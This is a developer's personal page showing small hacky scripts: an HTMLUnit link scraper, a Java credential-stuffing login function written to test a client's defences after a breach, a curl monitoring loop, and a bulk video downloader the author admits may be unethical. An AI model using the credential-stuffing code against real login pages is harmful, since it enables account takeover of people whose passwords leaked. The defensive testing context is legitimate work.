Web Scrape Examples
Over the years, I've built a collection of small scripts that I use to crawl and fetch data for myself. These are all pretty hacky and quick, but I often find useful.
Scrape to MySql
This particular script was used to pull links off a page at work. Every hour it will crawl a page and collect domains. The domains themselfs act as primay keys, and prevents duplicates. This is a good example of how to use HTMLUnit to fetch data.
public void runMe() {
try {
webClient = new WebClient(BrowserVersion.FIREFOX_38);
//webClient.getOptions().setThrowExceptionOnScriptError(false);
page = webClient.getPage(url);
//scrollToBottomOfPage();
final List<?> sectionPlayers = page.getByXPath("(//div[@class='section-asdf'])"); //get all section players on page
for (int i = 0; i < sectionPlayers.size(); i++) { //loop through them
System.out.println("NAWICE... Lets get the asdf links!");
HtmlDivision htmlDivision = (HtmlDivision) sectionPlayers.get(i);
if( htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf").size() == 1) { //more than one blog posted
List repostLink = htmlDivision.getElementsByAttribute("a", "class", "toggle-asdf"); //get the link to show posts
repostLink.get(0).click();
webClient.waitForBackgroundJavaScript(5000); //wait for the ajax page to reload
printLinksInSectionPlayer(htmlDivision); //print the new visible links
List showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-asdf"); //get the show more link
if ( showMoreLink.size() == 1) { //if we have a show more link...
showMoreLink.get(0).click(); //click it
webClient.waitForBackgroundJavaScript(5000); //wait for the ajax
printLinksInSectionPlayer(htmlDivision); //print the new visible links
while (htmlDivision.getElementsByAttribute("a", "class", "fav-asdf").size() == 2) { //if there are two links we have a next and prev button
showMoreLink = htmlDivision.getElementsByAttribute("a", "class", "fav-paging"); //get the next and prev buttons
showMoreLink.get(1).click(); //click the next button
webClient.waitForBackgroundJavaScript(5000);
printLinksInSectionPlayer(htmlDivision); //print the links
}
}
}
else {
printLinksInSectionPlayer(htmlDivision); //only one blog post this print it
}
}
webClient.closeAllWindows();
} catch (Exception e) {
System.out.println("Welp, something went wrong...");
e.printStackTrace();
}
System.out.println("DING! Toast is done!");
}
Credential Stuffing
After the Yahoo! email security breech, we discovered automated scripts using credential stuffing methods to access a client's domain. Here I wrote a similar attack, and used it as a test case to prove our solution worked. Here's a sampe of it.
private String getAuthToken(String username, String password) throws Exception {
String url = "https://" + endpointPrefix + ".example.com/j_spring_security_check";
URL obj = new URL(url);
HttpURLConnection con = (HttpURLConnection) obj.openConnection();
con.setInstanceFollowRedirects(false);
//add reuqest header
con.setRequestMethod("POST");
String urlParameters = "j_username=" + username + "&j_password=" + password;
// Send post request
con.setDoOutput(true);
DataOutputStream wr = new DataOutputStream(con.getOutputStream());
wr.writeBytes(urlParameters);
wr.flush();
wr.close();
printTheRequest(con);
String authToken = "";
List cookiesHeaders = con.getHeaderFields().get("Set-Cookie");
for (String cookieHeader : cookiesHeaders) {
HttpCookie cookie = HttpCookie.parse(cookieHeader).get(0);
if ( cookie.getName().equals("EXAMPLE_WD_WLJSESSIONID") ) {
authToken = cookie.getValue();
}
}
return authToken;
}
Monitor URL
This little bash script comes in handy when you're trying to prove a url is inconsistenly loading. Every 10 minutes I use curl to visit a page and print it's response code. In the case of this issue, our server had a different DNS server than our firewall, and recived an IP address to connect to that was not opened.
#!/bin/bash
# I often use this script to monitor connectivity. The output
# can be sent to your infrastructure team to prove a point...
while [ 1 ]
do
echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
echo `date` >> jm_watch_url.txt
echo aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> jm_watch_url.txt
curl -v https://www.google.com/recaptcha/api/siteverify 2>&1 | tee -a jm_watch_url.txt
sleep 1200
done
Video Scaping
Alright, maybe this one isn't all that ethical. I came across a series of videos online but the were buried in just about the worst online adds. This script was used to pull a list of all the urls, and store them in a local in memory database (actually persisted to your local disk). This meant I could shut down the script and allow it to resume downloading the videos laters. It also means I didn't have to restart from video one if something went wrong.
@Bean
public CommandLineRunner commandLineRunner(ApplicationContext ctx) throws Exception {
//GetWebsiteB getWebsiteB = ctx.getBean(GetWebsiteB.class);
//getWebsiteB.gatherLinks();
//getWebsiteB.downloadLinks();
GetWebsiteA getWebsiteA = ctx.getBean(GetWebsiteA.class);
getWebsiteA.gatherLinks();
getWebsiteA.downloadLinks();
return null;
}